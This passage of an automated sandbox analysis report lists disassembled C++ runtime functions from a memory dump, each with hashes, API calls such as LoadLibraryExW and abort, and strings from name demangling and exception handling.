                                                                                                                                          • Opcode ID: 1f2c6e9c8ad6c1917ecaa8d6efe9c468c91fc9baef10e6d9588306a72b9f3ebc
                                                                                                                                          • Instruction ID: d4ff39ab3bb3689019bd4ef037047d19d5f0395cf0da8221d9ec773b6a6d2b04
                                                                                                                                          • Opcode Fuzzy Hash: 1f2c6e9c8ad6c1917ecaa8d6efe9c468c91fc9baef10e6d9588306a72b9f3ebc
                                                                                                                                          • Instruction Fuzzy Hash: F9E1A3B2B08A818AE720AF36D4902BD7BA1FB44F68F1441B6DA9D47765DF38E495C700
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                                                                          • Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Name::operator+
                                                                                                                                          • String ID: cli::array<$cli::pin_ptr<$std::nullptr_t$std::nullptr_t $void$void
                                                                                                                                          • API String ID: 2943138195-2239912363
                                                                                                                                          • Opcode ID: e2dcc5ac231621b7bb9adceaede0f9dd180f9bba2b8fff5e7c5622460418e45f
                                                                                                                                          • Instruction ID: dba6580a2a57267591f59c3b4abd74c52651be419f6ee4b04271c7b9a41a2285
                                                                                                                                          • Opcode Fuzzy Hash: e2dcc5ac231621b7bb9adceaede0f9dd180f9bba2b8fff5e7c5622460418e45f
                                                                                                                                          • Instruction Fuzzy Hash: 585149A2F08F4598FB51EBA2D8412BC77B0BB08B64F4441F7CA4D526A5EF7C9065CB10
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                                                                          • Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: FileHeader$ExceptionFindInstanceRaiseTargetType
                                                                                                                                          • String ID: Access violation - no RTTI data!$Attempted a typeid of nullptr pointer!$Bad dynamic_cast!$Bad read pointer - no RTTI data!
                                                                                                                                          • API String ID: 1852475696-928371585
                                                                                                                                          • Opcode ID: 7f6c35cefbfcfc98e88ebc0aa35afe6c2c6ede9eabcdb344d1914a97fbaad475
                                                                                                                                          • Instruction ID: bf3c5928af7a4f54e96b48b622f0f3e575d0c6bfc1b8b3c3d21e3a7c1f9013cd
                                                                                                                                          • Opcode Fuzzy Hash: 7f6c35cefbfcfc98e88ebc0aa35afe6c2c6ede9eabcdb344d1914a97fbaad475
                                                                                                                                          • Instruction Fuzzy Hash: 6351BFA2B09E4692EE20EB66E4902B9A3A0FF44FA4F4444F3DA5D43675DF3CE525C301
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                                                                          • Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Name::operator+$Name::operator+=
                                                                                                                                          • String ID: {for
                                                                                                                                          • API String ID: 179159573-864106941
                                                                                                                                          • Opcode ID: edc966f78679f2c80b6a90da374f91d2d358e76260b44eb27b7c84d8a506cb89
                                                                                                                                          • Instruction ID: 9842e773e3412af4cf65e0198cabaf7c1106b0f0c0d1e2616a1ce861183a0ec5
                                                                                                                                          • Opcode Fuzzy Hash: edc966f78679f2c80b6a90da374f91d2d358e76260b44eb27b7c84d8a506cb89
                                                                                                                                          • Instruction Fuzzy Hash: 08515BB2B08A85A9E711AF26C4413FC77A1EB44B68F4480F2EA5C47BA9DF7CD560C340
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • LoadLibraryExW.KERNEL32(?,?,?,00007FFE1A456A6B,?,?,00000000,00007FFE1A45689C,?,?,?,?,00007FFE1A4565E5), ref: 00007FFE1A456931
                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00007FFE1A456A6B,?,?,00000000,00007FFE1A45689C,?,?,?,?,00007FFE1A4565E5), ref: 00007FFE1A45693F
                                                                                                                                          • wcsncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFE1A456A6B,?,?,00000000,00007FFE1A45689C,?,?,?,?,00007FFE1A4565E5), ref: 00007FFE1A456958
                                                                                                                                          • LoadLibraryExW.KERNEL32(?,?,?,00007FFE1A456A6B,?,?,00000000,00007FFE1A45689C,?,?,?,?,00007FFE1A4565E5), ref: 00007FFE1A45696A
                                                                                                                                          • FreeLibrary.KERNEL32(?,?,?,00007FFE1A456A6B,?,?,00000000,00007FFE1A45689C,?,?,?,?,00007FFE1A4565E5), ref: 00007FFE1A4569B0
                                                                                                                                          • GetProcAddress.KERNEL32(?,?,?,00007FFE1A456A6B,?,?,00000000,00007FFE1A45689C,?,?,?,?,00007FFE1A4565E5), ref: 00007FFE1A4569BC
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                                                                          • Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Library$Load$AddressErrorFreeLastProcwcsncmp
                                                                                                                                          • String ID: api-ms-
                                                                                                                                          • API String ID: 916704608-2084034818
                                                                                                                                          • Opcode ID: 45bb9c456b18d615664943834e4003b355ea3ec7f5874fc1f64106649d67ca5c
                                                                                                                                          • Instruction ID: 9efc9f075a334c014589cfccaaa18e5d51a6d937fe9a4bc18af7f42151a37550
                                                                                                                                          • Opcode Fuzzy Hash: 45bb9c456b18d615664943834e4003b355ea3ec7f5874fc1f64106649d67ca5c
                                                                                                                                          • Instruction Fuzzy Hash: 9131AF61B1AF8291EE11AB07A8001B5A2A4BF48FB0F5945B7DD2D4B7A4EF3CE164C700
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                                                                          • Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: abort$AdjustPointer
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1501936508-0
                                                                                                                                          • Opcode ID: ad7bbbe6b4c289a22ae1e43e79ef4439cf3ee9b14764b2eff01f06dd25f3f236
                                                                                                                                          • Instruction ID: 642b842a912d40fdf9c2c957ef8f5295bb4b61aa26bc49168820bcaec06eb6e7
                                                                                                                                          • Opcode Fuzzy Hash: ad7bbbe6b4c289a22ae1e43e79ef4439cf3ee9b14764b2eff01f06dd25f3f236
                                                                                                                                          • Instruction Fuzzy Hash: 4B5190A1F09E4382FA69AB57944427867A4AF44FB4F0985F7EA4E073A4DF3CE4618300
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                                                                          • Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: abort$AdjustPointer
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1501936508-0
                                                                                                                                          • Opcode ID: d386002f74db6febb42ef9b4bac4e43e25a554ab645870d9c47f674d5a84533b
                                                                                                                                          • Instruction ID: 6d06171c758477a8a6816760c24ef9a9f669ee0236d58f4a38a19748238d5f76
                                                                                                                                          • Opcode Fuzzy Hash: d386002f74db6febb42ef9b4bac4e43e25a554ab645870d9c47f674d5a84533b
                                                                                                                                          • Instruction Fuzzy Hash: 1A518FE2B09F4282EA65EB17954463863A4AF54FA4F0544F7EA4E077B4DF3CE861C300
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                                                                          • Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: FileHeader_local_unwind
                                                                                                                                          • String ID: MOC$RCC$csm$csm
                                                                                                                                          • API String ID: 2627209546-1441736206
                                                                                                                                          • Opcode ID: 385ada566cdd30ad99b7ac5e1d5c8025a7264eea7c22efa234297d7bd0e399d8
                                                                                                                                          • Instruction ID: 4bff93c56a7fd6fe365e17166ff9465f2d531dbb32de18e5b9e6cae2f04be60b
                                                                                                                                          • Opcode Fuzzy Hash: 385ada566cdd30ad99b7ac5e1d5c8025a7264eea7c22efa234297d7bd0e399d8
                                                                                                                                          • Instruction Fuzzy Hash: 455180B2B09A4186EA60BF36900037966A0FF44FB4F5410F3DA4D833A5DF3CE4618A82
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                                                                          • Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: NameName::atol
                                                                                                                                          • String ID: `template-parameter$void
                                                                                                                                          • API String ID: 2130343216-4057429177
                                                                                                                                          • Opcode ID: 2821a58495c29764098872c6b010649cccddcb6c42941e500fb92a9452cac6b1
                                                                                                                                          • Instruction ID: f85b8549f5f1985b488acaa23aca29926417e0d0263a1e5a1928cf8fb42e78bc
                                                                                                                                          • Opcode Fuzzy Hash: 2821a58495c29764098872c6b010649cccddcb6c42941e500fb92a9452cac6b1
                                                                                                                                          • Instruction Fuzzy Hash: 18415A62F08F4688FB04EBA6D8512FC2371BF08BA4F5401B6CE5D17A65DF38946AC340
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                                                                          • Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Name::operator+
                                                                                                                                          • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                                                                                                                          • API String ID: 2943138195-2211150622
                                                                                                                                          • Opcode ID: 16d5b7056506ac1aa3be62c87a897449e0af35361c1a5b370ad614f7e7c3f2e7
                                                                                                                                          • Instruction ID: c22a252683084e3a78dcfab078d5ef6a1db550ae4a7256e82204d7d60a5a2148
                                                                                                                                          • Opcode Fuzzy Hash: 16d5b7056506ac1aa3be62c87a897449e0af35361c1a5b370ad614f7e7c3f2e7
                                                                                                                                          • Instruction Fuzzy Hash: 594136B2F08F8688FB029B26D8402BC77B0BB08B58F5441B2DA5D53364DF3CA5A5C740
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                                                                          • Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Name::operator+
                                                                                                                                          • String ID: char $int $long $short $unsigned
                                                                                                                                          • API String ID: 2943138195-3894466517
                                                                                                                                          • Opcode ID: 1a667bf595c3f0eddcec5e75b1b20bf055c895b242c78c01af1086ecda962d52
                                                                                                                                          • Instruction ID: ab7eec8e7cedd0bc971dd47ea2ea2625ab5d47f9e626b2c2f00abce42a1f2c98
                                                                                                                                          • Opcode Fuzzy Hash: 1a667bf595c3f0eddcec5e75b1b20bf055c895b242c78c01af1086ecda962d52
                                                                                                                                          • Instruction Fuzzy Hash: B34168B2F18B5689EB159F6AD8481BC37B1BB09B68F4481B3CA0C57B78DF389564C700
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                                                                          • Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: free$EntryInterlockedListNamePush__unmallocstrcpy_s
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3741236498-0
                                                                                                                                          • Opcode ID: 6447550c70440ae48e9dc09acfbe7fa3055870e3a5d625089a78ddc05dba8847
                                                                                                                                          • Instruction ID: 48b66aaf2916ad99ba7d7c3e519d6005a89472b45c0c69aa8ded052bad530d61
                                                                                                                                          • Opcode Fuzzy Hash: 6447550c70440ae48e9dc09acfbe7fa3055870e3a5d625089a78ddc05dba8847
                                                                                                                                          • Instruction Fuzzy Hash: 5931C461B19F9181EB11AB27E804579A3A4FF08FE4B5945F6DE2D433A0EE3DD462C300
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                                                                          • Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: abort$CallEncodePointerTranslator
                                                                                                                                          • String ID: MOC$RCC
                                                                                                                                          • API String ID: 2889003569-2084237596
                                                                                                                                          • Opcode ID: 63425386b35f735f5eb303e83bfbe55818570f32e5447e3767ff35a3eaf3afb3
                                                                                                                                          • Instruction ID: e6ea8166ce1a269e67d5f5a9ff2da1a762e861be9e7c81596e1e14aef120ebb0
                                                                                                                                          • Opcode Fuzzy Hash: 63425386b35f735f5eb303e83bfbe55818570f32e5447e3767ff35a3eaf3afb3
                                                                                                                                          • Instruction Fuzzy Hash: AA91A2B3B08B818AE710DB66E4902BD7BA0F744B98F1441A6EF8D17765DF38E1A5C700
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                                                                          • Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Name::operator+
                                                                                                                                          • String ID: std::nullptr_t$std::nullptr_t $volatile$volatile
                                                                                                                                          • API String ID: 2943138195-757766384
                                                                                                                                          • Opcode ID: 8ec89114dc1e92fb087ff84a90b975bd849231731579a14e6ae3ff20f009c8f1
                                                                                                                                          • Instruction ID: f4d7375158b3fc1cf319c244564212f4ac27a0ac0a577c98ebed872f8e82aa37
                                                                                                                                          • Opcode Fuzzy Hash: 8ec89114dc1e92fb087ff84a90b975bd849231731579a14e6ae3ff20f009c8f1
                                                                                                                                          • Instruction Fuzzy Hash: 1B715DB1B08E4294EB14AF16D9401BC66B0BB05BA4F4485FBDA5D47AB8EF3CE175CB00
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                                                                          • Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: abort$CallEncodePointerTranslator
                                                                                                                                          • String ID: MOC$RCC
                                                                                                                                          • API String ID: 2889003569-2084237596
                                                                                                                                          • Opcode ID: bda6881e4fb6ddd96fb50e60b72b5d1eaa618bcc944dda4a5bc0b193bb5b3b27
                                                                                                                                          • Instruction ID: 8141f7a08248614ccb6f765a2cdc714d694623d21637336d0a2bdc5609fc6457
                                                                                                                                          • Opcode Fuzzy Hash: bda6881e4fb6ddd96fb50e60b72b5d1eaa618bcc944dda4a5bc0b193bb5b3b27
                                                                                                                                          • Instruction Fuzzy Hash: 48613AB7A08B858AE718DF66D4803BD77A0FB44B98F1441A6EE4D13B68DF38E065C700
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                                                                          • Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: NameName::$Name::operator+
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 826178784-0
                                                                                                                                          • Opcode ID: 7682a6ebcb32bf14f43659220100a1b4a5a4a6e3db385e7ce84af32120df353b
                                                                                                                                          • Instruction ID: 481c71f12d8dc657a2eb355d85b103667f52c7a1ab074373772cce4ab92c22e3
                                                                                                                                          • Opcode Fuzzy Hash: 7682a6ebcb32bf14f43659220100a1b4a5a4a6e3db385e7ce84af32120df353b
                                                                                                                                          • Instruction Fuzzy Hash: CF4147A2B18F5699EB10EF22D8841B833B4BB15FA4B5444F3EA5D533A5DF38E865C300
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 00007FFE1A456710: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE1A45239E), ref: 00007FFE1A45671E
                                                                                                                                          • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A4541C3
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                                                                          • Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667618928.00007FFE1A466000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          • Associated: 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_1_2_7ffe1a450000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: abort
                                                                                                                                          • String ID: $csm$csm
                                                                                                                                          • API String ID: 4206212132-1512788406
                                                                                                                                          • Opcode ID: a1e41bd14f4dc8a012b9b6851bae8dba3a2639313cd67671a1d4b299b7556132
                                                                                                                                          • Instruction ID: ec594808b087c04fd1a0d2c26028ba867c211003b764cc75c8273e96fe0df898
                                                                                                                                          • Opcode Fuzzy Hash: a1e41bd14f4dc8a012b9b6851bae8dba3a2639313cd67671a1d4b299b7556132
                                                                                                                                          • Instruction Fuzzy Hash: 9371D3B2B08A9186D7249F22944477D7BA1FB04FE8F1481B6EF4C4BAA6CB3CD461C741
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 00007FFE1A456710: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE1A45239E), ref: 00007FFE1A45671E
                                                                                                                                          • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A453F13
                                                                                                                                          • __FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FFE1A453F23
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000001.00000002.1667461864.00007FFE1A451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                                                                          • Associated: 00000001.00000002.1667212712.00007FFE1A450000.00000002.00000001.01000000.00000005.sdmpDownload File
